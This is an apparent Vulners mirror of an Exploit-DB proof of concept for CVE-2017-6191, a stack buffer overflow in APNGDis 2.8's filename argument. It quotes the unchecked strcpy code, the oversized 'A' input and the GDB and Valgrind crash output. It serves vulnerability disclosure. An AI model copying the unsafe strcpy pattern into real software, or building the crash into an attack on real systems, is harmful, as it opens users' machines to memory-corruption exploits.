Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

APNGDis 2.8 - 'filename' Stack Buffer Overflow (PoC)

🗓️ 14 Mar 2017 00:00:00Reported by Alwin PeppelsType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 31 Views

Overflow in APNGDis 2.8 filename paramete

Related
Code
ReporterTitlePublishedViews
Family
0day.today		APNGDis 2.8 - filename Stack Buffer Overflow Exploit
22 Mar 201700:00
zdt
0day.today		APNGDis 2.8 - chunk size descriptor Heap Buffer Overflow Exploit
22 Mar 201700:00
zdt
CNVD		APNGDis Buffer Overflow Vulnerability
23 Mar 201700:00
cnvd
CVE		CVE-2017-6191
23 Mar 201716:00
cve
Cvelist		CVE-2017-6191
23 Mar 201716:00
cvelist
EUVD		EUVD-2017-15256
7 Oct 202500:30
euvd
EUVD		EUVD-2017-15257
7 Oct 202500:30
euvd
exploitpack		APNGDis 2.8 - filename Stack Buffer Overflow (PoC)
14 Mar 201700:00
exploitpack
NVD		CVE-2017-6191
23 Mar 201716:59
nvd
OSV		CVE-2017-6191
23 Mar 201716:59
osv
Rows per page
# Exploit Title: APNGDis filename Buffer Overflow
# Date: 14-03-2017
# Exploit Author: Alwin Peppels
# Vendor Homepage: http://apngdis.sourceforge.net/
# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
# Version: 2.8
# Tested on: Linux Debian / Windows 7
# CVE : CVE-2017-6191

Additional analysis:
https://www.onvio.nl/nieuws/cve-2017-6191-apngdis-filename-buffer-overflow

Textbook buffer overflow; a fixed size buffer gets allocated with
szPath[256], and the first command line argument is stored without
validation.


int main(int argc, char** argv)
{
	unsigned int i, j;
	char * szInput;
	char * szOutPrefix;
	char szPath[256];
	char szOut[256];
	std::vector frames;
	printf("\nAPNG Disassembler 2.8\n\n");

	if (argc > 1)
		szInput = argv[1];
	else
	{
		printf("Usage: apngdis anim.png [name]\n");
		return 1;
	}
	strcpy(szPath, szInput);
}




With 'A' * 1000 as argv[1] :


GDB:

Program received signal SIGSEGV, Segmentation fault.
strlen () at ../sysdeps/x86_64/strlen.S:106
106     ../sysdeps/x86_64/strlen.S: No such file or directory.
(gdb) i r
rax            0x4141414141414141       4702111234474983745
rbx            0x7ffff70ea600   140737338320384
rcx            0x141    321
rdx            0x0      0
rsi            0x7fffffffca40   140737488341568
rdi            0x4141414141414141       4702111234474983745
rbp            0x7fffffffceb0   0x7fffffffceb0
rsp            0x7fffffffc948   0x7fffffffc948
r8             0x4141414141414141       4702111234474983745
r9             0x9      9
r10            0x73     115
r11            0x7fffffffce78   140737488342648
r12            0x555555558c9f   93824992251039
r13            0x7fffffffcec8   140737488342728
r14            0x0      0
r15            0xffffffffffffffff       -1
rip            0x7ffff6dd1486   0x7ffff6dd1486 <strlen+38>
eflags         0x10297  [ CF PF AF SF IF RF ]


Valgrind:

==10685== Invalid read of size 1
==10685==    at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
==10685==    by 0x5B6ADA2: vfprintf (vfprintf.c:1637)
==10685==    by 0x5B711F8: printf (printf.c:33)
==10685==    by 0x109F05: load_apng(char*, std::vector<APNGFrame,
std::allocator<APNGFrame> >&) (apngdis.cpp:200)
==10685==    by 0x10B24E: main (apngdis.cpp:498)
==10685==  Address 0x4141414141414141 is not stack'd, malloc'd or
(recently) free'd
==10685==
==10685==
==10685== Process terminating with default action of signal 11 (SIGSEGV)
==10685==  General Protection Fault
==10685==    at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
==10685==    by 0x5B6ADA2: vfprintf (vfprintf.c:1637)
==10685==    by 0x5B711F8: printf (printf.c:33)
==10685==    by 0x109F05: load_apng(char*, std::vector<APNGFrame,
std::allocator<APNGFrame> >&) (apngdis.cpp:200)
==10685==    by 0x10B24E: main (apngdis.cpp:498)
Reading '==10685==
==10685== HEAP SUMMARY:
==10685==     in use at exit: 0 bytes in 0 blocks
==10685==   total heap usage: 2 allocs, 2 frees, 73,728 bytes allocated
==10685==
==10685== All heap blocks were freed -- no leaks are possible

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Mar 2017 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 26.8
CVSS 37.8
EPSS0.11746
buffer overflowapngdiscve-2017-6191segmentation faultlinuxwindowsstack buffervalidationvector frames
31